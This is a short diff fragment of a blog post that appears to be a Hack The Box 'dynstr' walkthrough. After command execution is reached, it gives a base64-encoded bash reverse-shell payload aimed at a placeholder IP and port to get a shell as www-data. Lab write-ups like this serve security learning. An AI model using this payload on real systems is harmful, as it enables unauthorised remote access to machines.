ch3sh/ch3sh.github.io/_posts/2021-10-15-HTB-dynstr.md

 ![/img/dynstr/cmd-exec.png](/img/dynstr/cmd-exec.png)

 We have now achieved command execution.

+### Getting shell as www-data

 Let us use this to get a reverse shell.
 We will take the following payload and base64 encode it.

 `echo "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'" | base64`